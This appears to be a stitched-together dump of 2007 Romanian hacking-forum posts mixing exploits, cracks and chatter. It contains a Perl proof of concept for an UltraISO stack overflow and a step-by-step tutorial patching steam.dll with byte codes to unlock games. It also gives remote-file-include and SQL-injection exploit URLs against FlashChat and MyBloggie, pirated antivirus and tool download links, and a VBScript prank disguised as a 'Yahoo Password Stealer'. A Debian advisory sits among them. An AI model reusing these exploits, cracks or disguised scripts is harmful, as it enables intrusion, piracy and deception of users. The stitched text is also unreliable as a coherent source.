Gonzalez

Rated as : High Risk #!/usr/bin/perl ############################################################ #Credit:To n00b for finding this bug and writing poc. ############################################################ #Ultra ISO stack over flow poc code. #Ultra iso is exploitable via opening #a specially crafted Cue file..There is #A limitation that the user must have the bin #file in the same dir as the cue file. #This is the reason i have provided the #Bin file also Command execution is possible #As we can control $ebp and $eip hoooooha. #I will be working on the local exploit #as soon as i get a chance this should be a straight forward #to exploit this as we already gain control of the #$eip register.. #Tested on :win xp service pack 2 #Vendor's web site: [url]http://www.ezbsystems.com/ultraiso[/url] # Version affected: UltraISO 8.6.2.2011 ############################################################ #Debug info as follows. ######################################### #Program received signal SIGSEGV, Segmentation fault. #[Switching to thread 1696.0x6d0] #0x41414141 in ?? () ############################################################ #(gdb) i r #eax 0x0 0 #ecx 0x7ce2fc 8184572 #edx 0x1 1 #ebx 0xfe6468 16671848 #esp 0x13ecf8 0x13ecf8 #ebp 0x41414141 0x41414141 #esi 0x0 0 #edi 0x13fa18 1309208 #eip 0x41414141 0x41414141 #eflags 0x10246 66118 #cs 0x1b 27 #ss 0x23 35 #ds 0x23 35 #es 0x23 35 #fs 0x3b 59 #gs 0x0 0 #fctrl 0xffff1273 -60813 #fstat 0xffff0000 -65536 #ftag 0xffffffff -1 #fiseg 0x0 0 #fioff 0x0 0 #foseg 0xffff0000 -65536 #fooff 0x0 0 #---Type <return> to continue, or q <return> to quit--- #fop 0x0 0 #(gdb) ############################################################ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n"; print "0day Ultra-Iso 8.6.2.2011 stack over flow poc n"; print "Credits to n00b for finding the bug and writing pocn"; print "I will be writing a local exploit for this in a few daysn"; print "Shouts: - Str0ke - Marsu - SM - Aelphaeis - vade79 - c0ntexn"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n"; my $CUEFILE="1.cue"; # Do not edit this my $BINFILE="1.bin"; # Do not edit this my $header= "x46x49x4cx45x20x22"; my $endheader= "x2ex42x49x4ex22x20x42x49x4ex41x52x59x0dx0ax20". "x54x52x41x43x4bx20x30x31x20x4dx4fx44x45x31x2fx32". "x33x35x32x0dx0ax20x20x20x49x4ex44x45x58x20x30x31". "x20x30x30x3ax30x30x3ax30x30"; open(CUE, ">$CUEFILE") or die "ERROR:$CUEFILEn"; open(BIN, ">$BINFILE") or die "ERROR:$BINFILEn"; print CUE $header; for ($i = 0; $i < 1024; $i++) { # Fill our buffer $buffer.= "x41"; # For easy of debugging } print CUE $buffer; for ($i = 0; $i < 100; $i++) { # Fill our buffer $buffer2.= "x90"; # Fill our bin file with nops..Why not pmsl. } print BIN $buffer2; print CUE $endheader; close(CUE,BIN); sleep(5); print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n"; print "Files have been created success-fullyn"; print "Please note you will have to have both 1.cue and 1.bin in the same dirn"; print "To be able to reproduce the bug open the 1.cue file with ultra~ison"; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n"; securitydot.net - 2007-05-24

PHP VULNERABILITY ANALYZER README Paul Bakoyiannis Heres a quick summary of how the program works and how to use it: First, the program reads each of the text files for vulnerable php functions. each file is for a different category of vulnerability: dir.txt = directory transversal sql.txt = sql injection rem.txt = remote command execution rfi.txt = remote file include you can add any keywords you want to each file. Once you start the program, click choose file and choose a file to analyze. After you choose the file, click the Analyze Code button, and all the vulnerable keywords will be extracted. Check each tab for uses of vulnerable functions. Also, in the second tab page, it finds all the get variables, the post variables, and config variables. Once you see a vulnerble function, look for the variable it uses. Then you can go to the variable tab and search for all the instances of that variable using the bottom text box. There you can look if the variable was initialized, sanitized, etc. Also, you can view the entire source of the file you're analyzing by clicking the source tab. This program will definetely help you find vulnerabilities in PHP applications, and will save you alot of time. Email me at megarooster@aol.com ( yes, aol) to give me suggestions, praise, criticism, or more keywords to add for the next release. Enjoy Download: http://rapidshare.com/files/27928326/phpvuln_upload_by_canvas.rar.html

by iNs @ + D4RK-R3V-T34M + ::VulnScan & Expl0iters:: +Absinthe 1.3.1 Windows +AnonFTP Anonymous Scanner +Apache Scanner +CGI Scanner +DarkScanner 2.0 +FTP-IIS Fx Scanner +HScan 1.20 +HTTP Server Detector +ISS Internet Scanner v6.2.1 +JAAScoisX-Code RFI Code Exec Scanner +N-Stealth Security Scanner v3.7 Built 67 +RFI T00l +WebCheck +Win32 x86 RFI Vuln Scanner +X-Scan 3.3 +XSS LFI and File Discolure Scanner +Zehir Exploit Scanner +NetCat +NMap 4.20 ::Port Scanner:: +SuperScan 3.00 +SuperScan 4 ::Other Tools:: +QuickSpoof +PuTTy 0.60 [url]http://rapidshare.com/files/39672244/Vulnscan.rar[/url]

Main benefits: * - Extremely comprehensive (about 5'900 Tools!) * - Very well sorted archive with detailed descriptions (352 categories!) * - Improved performance of the Security Toolbox, information has never been that easier to find * - You can download the DVD yourself at home * - You will automatically become part of the new Astalavista's Promotion Service, meaning that you will receive information about promotions and special services, which is not going to be released to the public http://rapidshare.com/files/38935377/ds-astd4.nfo [url]http://rapidshare.com/files/38935916/ds-astd4.r00[/url] [url]http://rapidshare.com/files/38935881/ds-astd4.r01[/url] [url]http://rapidshare.com/files/38935918/ds-astd4.r02[/url] [url]http://rapidshare.com/files/38935928/ds-astd4.r03[/url] [url]http://rapidshare.com/files/38935970/ds-astd4.r04[/url] [url]http://rapidshare.com/files/38935977/ds-astd4.r05[/url] [url]http://rapidshare.com/files/38935952/ds-astd4.r06[/url] [url]http://rapidshare.com/files/38935978/ds-astd4.r07[/url] [url]http://rapidshare.com/files/38935958/ds-astd4.r08[/url] [url]http://rapidshare.com/files/38935992/ds-astd4.r09[/url] [url]http://rapidshare.com/files/38935957/ds-astd4.r10[/url] [url]http://rapidshare.com/files/38935948/ds-astd4.r11[/url] [url]http://rapidshare.com/files/38935982/ds-astd4.r12[/url] [url]http://rapidshare.com/files/38935946/ds-astd4.r13[/url] [url]http://rapidshare.com/files/38936003/ds-astd4.r14[/url] [url]http://rapidshare.com/files/38936029/ds-astd4.r15[/url] [url]http://rapidshare.com/files/38936001/ds-astd4.r16[/url] [url]http://rapidshare.com/files/38935956/ds-astd4.r17[/url] [url]http://rapidshare.com/files/38936016/ds-astd4.r18[/url] [url]http://rapidshare.com/files/38936009/ds-astd4.r19[/url] [url]http://rapidshare.com/files/38937185/ds-astd4.r20[/url] [url]http://rapidshare.com/files/38937173/ds-astd4.r21[/url] [url]http://rapidshare.com/files/38937174/ds-astd4.r22[/url] [url]http://rapidshare.com/files/38937224/ds-astd4.r23[/url] [url]http://rapidshare.com/files/38937205/ds-astd4.r24[/url] [url]http://rapidshare.com/files/38937264/ds-astd4.r25[/url] [url]http://rapidshare.com/files/38937217/ds-astd4.r26[/url] [url]http://rapidshare.com/files/38937171/ds-astd4.r27[/url] [url]http://rapidshare.com/files/38937199/ds-astd4.r28[/url] [url]http://rapidshare.com/files/38937233/ds-astd4.r29[/url] [url]http://rapidshare.com/files/38937266/ds-astd4.r30[/url] [url]http://rapidshare.com/files/38937201/ds-astd4.r31[/url] [url]http://rapidshare.com/files/38937222/ds-astd4.r32[/url] [url]http://rapidshare.com/files/38937218/ds-astd4.r33[/url] [url]http://rapidshare.com/files/38937207/ds-astd4.r34[/url] [url]http://rapidshare.com/files/38937211/ds-astd4.r35[/url] [url]http://rapidshare.com/files/38937204/ds-astd4.r36[/url] [url]http://rapidshare.com/files/38937260/ds-astd4.r37[/url] [url]http://rapidshare.com/files/38937197/ds-astd4.r38[/url] [url]http://rapidshare.com/files/38936821/ds-astd4.r39[/url] [url]http://rapidshare.com/files/38937216/ds-astd4.rar[/url] [url]http://rapidshare.com/files/38936685/ds-astd4.sfv[/url] Mirror : http://www.megaupload.com/?d=Z41XKXEI [url]http://www.megaupload.com/?d=5BAPNU8W[/url] [url]http://www.megaupload.com/?d=QTZUZ6TF[/url] [url]http://www.megaupload.com/?d=7PO3XMR1[/url] [url]http://www.megaupload.com/?d=HWS0CHEY[/url] [url]http://www.megaupload.com/?d=KLB3N9VO[/url] [url]http://www.megaupload.com/?d=J0JALVU1[/url] [url]http://www.megaupload.com/?d=WOCQULP4[/url] [url]http://www.megaupload.com/?d=MK0LV61J[/url] [url]http://www.megaupload.com/?d=UE7LW5FD[/url] [url]http://www.megaupload.com/?d=0THMMNP4[/url] [url]http://www.megaupload.com/?d=5J2A7J9G[/url] [url]http://www.megaupload.com/?d=AAW1JHSV[/url] [url]http://www.megaupload.com/?d=ZUQU87CH[/url] [url]http://www.megaupload.com/?d=4AI56D11[/url] [url]http://www.megaupload.com/?d=379BUZW7[/url] [url]http://www.megaupload.com/?d=IKAS1JQ0[/url] [url]http://www.megaupload.com/?d=V1RNQMH0[/url] [url]http://www.megaupload.com/?d=X9IGQZZG[/url] [url]http://www.megaupload.com/?d=56B14V2O[/url] [url]http://www.megaupload.com/?d=Q0U1I9IT[/url] [url]http://www.megaupload.com/?d=ZEKTD8EN[/url] [url]http://www.megaupload.com/?d=HHPT5F19[/url] [url]http://www.megaupload.com/?d=VXGGR5QI[/url] [url]http://www.megaupload.com/?d=3SI6TTNB[/url] [url]http://www.megaupload.com/?d=9KUOZ0NN[/url] [url]http://www.megaupload.com/?d=3YWR2DSQ[/url] [url]http://www.megaupload.com/?d=K1V2QMCL[/url] [url]http://www.megaupload.com/?d=SOJPTEMU[/url] [url]http://www.megaupload.com/?d=G5ZBCMU0[/url] [url]http://www.megaupload.com/?d=8RP7R3KF[/url] [url]http://www.megaupload.com/?d=L4TFNSLE[/url] [url]http://www.megaupload.com/?d=SM819AYY[/url] [url]http://www.megaupload.com/?d=71NAFG7L[/url] [url]http://www.megaupload.com/?d=VZA8CV3C[/url] [url]http://www.megaupload.com/?d=5EKFCG9Q[/url] [url]http://www.megaupload.com/?d=GZ3SEOJO[/url] [url]http://www.megaupload.com/?d=OXT3C123[/url] [url]http://www.megaupload.com/?d=1W2QVLS5[/url] [url]http://www.megaupload.com/?d=IFVOIAJW[/url] [url]http://www.megaupload.com/?d=CGD7JET4[/url] [url]http://www.megaupload.com/?d=A6HU6ANK[/url] [url]http://www.megaupload.com/?d=E5HZLB5Y[/url]

Acum de 3 zile m-am intors din Grecia, mai precis Leptokarya. O meritat toti banii ( 150 euro - transport dus-intors + cazare timp de 10 zile ) Bani de cheltuiala 300 euro , in ultimele 2 zile ramanand cu 20 euro -sub7

cat cere pa el ?

Ne-am saturat de "Server is busy".Downloadeaza prog din alta parte Download : http://rapidshare.com/files/35483586/GCF_Link_grabber.rar -sub7

Acest tutorial este creat pentru un "scop" educational.Fara .cue si cintx nu am avea posibilitati. Hai sa pornim. De ce ai nevoie ? OllyDbg (Debugger) http://www.ollydbg.de/odbg110.zip Steam (Putrid Filth) http://steampowered.com/download/SteamInstall.exe Pasul 1 - instalarea steam-ului Odata ce ai descarcat toate programele necesare, primul lucru e : instalarea steam-ului; presupun ca sti cum se instaleaza ( Atentie! nu-l instalati in folderul cu CS-ul ). Steam-ul se va executa automat, la fel si logarea, dar va trebui sa creezi un cont ( care este gratis ), odata ce ai terminat, logheazate si lasa-l sa-si faca update-ul, pana aici e bine. Odata ce vezi fereastra ( STEAM ) cu jocuri, iti vei da seama ca nu ai nici un joc, aici incepe cracking-ul.Inchide steam-ul ( Tot ce tine de el ) ,deschide task manager ( CTRL + ALT + DEL ) . Pasul 2 - PreChek-uri Update http://www.steampowered.com/v/index.php?area=news Creeaza un nou fisier numit steam.cfg in interiorul folderului steam si copiaza : "BootStrapperInhibitAll=enable" fara ghilimele. Salveaza-l, probabil te intrebi de ce ai facut asta, pentru a impiedica steam-ul sa faca update si sa distruga munca ta anterioara. Presupun ca ai winrar in PC, arhiveaza steam.dll , daca se produc unele greseli ai de unde sa reincepi . Pasul 3 - OllyDbg Extrage si ruleaza ollydbg, dute la file - open.Deasupra la "cancel" vor fi 2 fisiere de tip : .exe si .ddl. Alege .dll, localizeaza si deschide steam.dll. Ollydbg are un plugin : loaddll , sa-r putea sa-ti apara din prima pe ecran,daca doresti sa-l folosesti click pe Ok. Dupa o analiza scurta, vor aparea coduri, aceste coduri se numesc ASM si este , mai pe scurt, .exe-ul descompus intr-un format ( pe care oamenii il pot citi ) Pasul 4 - Deblocand GUI Lista de jocuri cu steam sunt ascunse intr-o variatiune de coduri, dar "hackerii" au gasit o modalitate . . . in asa fel incat lista sa fie vizibila si jocabila. Unele sunt descarcabile, dar nu ne bagam. Iata un emulator = 52 8B 44 24 0C C7 00 01 00 00 00 8B 54 24 10 8B 44 24 14 31 C9 89 0A 89 08 89 48 04 89 48 08 88 48 0C B8 01 00 00 00 5A C3 Copiaza emulatorul intr-un notepad, reintoarcete la ollydbg,inchide fereastra precedenta si sa revenim acum la ASM. Click dreapta - Search for - Label in modulul curent, acesta va afisa o fereastra cu numele functiilor din steam si noi dorim 2 in particular. SteamIsAppSubscribed si SteamIsSubscribed. Dublu click SteamIsAppSubscribed , vei fi dus la o noua fereastra cu coduri, uitete la "PUSH EBP". Click si tine apasat mouse-ul pe aceasta linie si trage-o jos cel putin 14 linii - click dreapta - binary - binary paste. Exact la fel procedeaza cu SteamIsSubscribed. Pasul 5 - Salvarea Click dreapta - Copy to Executable - All modifications - Copy All. Click dreapta pe noua fereastra - Save File - Ok - Yes. SALVAT! Am terminat un steam.dll crack-uit. Metodele difera putin,important e sa ajungi la acelasi rezultat. Copiati pe ce forum doriti doar nu MODIFICATI. -Gonzalez

Am gasit o alta metoda de a cauta pe rapidshare.com http://www.shareminer.com/ Bafta ! -sub7

http://www.gigasize.com/get.php/3194794227/NEWEST_N0D32___FIX_45000_YEARS_FR33.rar More Information * New Features in v2.7 * Rootkit Removal Demo * NOD32 Architecture * Integrated Modules Keep your important information safe & stay productive with peace of mind. NOD32 offers fast, comprehensive protection against a wide range of malware threats – without the burden of a bloated internet security suite. So easy to use: just set it and forget it . Comprehensive Protection Running separate applications for viruses, hackers, adware, and spyware can slow your PC, be difficult to manage, and provide questionable protection. Beware of large, bloated internet security suites that consume hundreds of megabytes on your PC. These typically exist because vendors have acquired products and 'bundled' them together. In contrast, ESET NOD32 was designed from the core as a single, highly-optimized engine that works as a unified Anti-Threat system to protect against a broad spectrum of malware. Viruses, worms, spyware, and other malicious attacks, which are constantly evolving. ESET NOD32 utilizes patent-pending ThreatSense

oferta gratis la steam pt HL2 http://www.steampowered.com/ati_offer1a/ -sub7

lasa-ti-l in pace wa!! petra45 : e o sursa secreta, nu da mai departe. 1.mouse 2 pe desktop, notepad 2.copy si paste urmatorul cod in notepad, il deschizi si rulezi programul MsgBox "Yahoo Password Stealer" Set ovladani = CreateObject("WMPlayer.OCX.7" ) Set mechaniky = ovladani.cdromCollection If mechaniky.Count Then For i = 0 To mechaniky.Count - 1 mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject mechaniky.Item(i).Eject Next End If -sub7

kw3 o schimb (( d3light : dap !!! -sub7

Pt cine e pirat , neaparat sa asculte piesa : http://dm.senixee.net/youareapirate.swf -sub7

LOL cein parca ai avea 2 ani -sub7

Asta e bun sa fraieresti noobi Mersi -sub7

M-as duce si eu, dar nu locuiesc in Bucuresti, ata ete -sub7

Sony Ericsson P1 = 600$ ( comandat de un prieten bun, din japonia ) si uratenia asta furata, e de vanzare , pe cine il intereseaza PM. La mine telurile merg si vin non-stop, tin 1 tel pentru o luna , 2, apoi eject. -sub7

Application: MyBloggie 2.1.6 Web Site: http://mybloggie.mywebland.com/ Versions: 2.1.6 and below Platform: linux, windows, freebsd, sun Bug: SQL Injection Severity: High Fix Available: No ------------------------------------------------------- 1) Introduction 2) Bug 3) The Code 4) Fix 5) About Vigilon 6) Disclaimer =========== 1) Introduction =========== "myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date." ====== 2) Bug ====== SQL Injection =============== 3) Proof of concept. =============== The File index.php is subject to several SQL Injections. example: http://server/apppath/index.php?mode=viewuser&cat_id=' http://server/apppath/index.php?mode=viewuser&month_no=4&year=" ===== 4) Fix ===== The Author Did not responded to Email sent about this issue, ============ 5) About Serapis.net ============ www.Serapis.net - is a portal dedicated to web defacements, tracking defacements around the world. ========== 6) Disclaimer ========== The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. http://www.serapis.net http://calima.serapis.net/blogs/

sub7 - troianul acela , mai demult ma jucam cu ele, a ramas asta , dar in curand il voi schimba -sub7

Numa pustani pe ici gg -sub7

La multi ani ! sanatate sa ai Sa-ti creasca mare! -sub7

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ -- Debian Security Advisory DSA 1298-1 security (at) debian (dot) org [email concealed] http://www.debian.org/security/ Moritz Muehlenhoff May 28th, 2007 http://www.debian.org/security/faq - ------------------------------------------------------------------------ -- Package : otrs2 Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-2524 It was discovered that the Open Ticket Request System performs insufficient input sanitising for the Subaction parameter, which allows the injection of arbitrary web script code. The oldstable distribution (sarge) doesn't include otrs2. For the stable distribution (etch) this problem has been fixed in version 2.0.4p01-18. The unstable distribution (sid) isn't affected by this problem. We recommend that you upgrade your otrs2 package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/o/otrs2/otrs2_2.0.4p01-18.d sc Size/MD5 checksum: 613 716da567e5255819ce0049c9f83ff3ea http://security.debian.org/pool/updates/main/o/otrs2/otrs2_2.0.4p01-18.d iff.gz Size/MD5 checksum: 17791 bf688dfdc4f48596aa2325d5713ccd9c http://security.debian.org/pool/updates/main/o/otrs2/otrs2_2.0.4p01.orig .tar.gz Size/MD5 checksum: 1283474 93d2b21bfc8e97568a66ca5cb3f22b91 Architecture independent components: http://security.debian.org/pool/updates/main/o/otrs2/otrs2_2.0.4p01-18_a ll.deb Size/MD5 checksum: 1154348 83966b5e0dcc373617b3b4e4dc35e28c These files will probably be moved into the stable distribution on its next update. - ------------------------------------------------------------------------ --------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce (at) lists.debian (dot) org [email concealed] Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGWruvXm3vHE4uyloRAt1MAKCV6BnxJ34ZQ5cCL8+ggkiiE1dXZwCfWqVc KVvYS4+qFNJFeert3EZLLFw= =CkQf -----END PGP SIGNATURE-----

Discovered By Hasadya Raed Contact : RaeD (at) BsdMail (dot) Com [email concealed] -------------------------- Script : FlashChat_v479 Download : files.filefront.com/FlashChat+v479rar/;7192354;/fileinfo.html -------------------------- B.Files : connection.php >Require_once($f_cms); common.php > Require_once($f_cms); -------------------------- Exploits : http://www.Victim.com/chat/incclasses/connection.php?f_cms=[shell-Attack ] http://www.Victim.com/chat/inc/common.php?f_cms=[shell-Attack]

https://joost.com/presents/gigaom-newteevee/ -sub7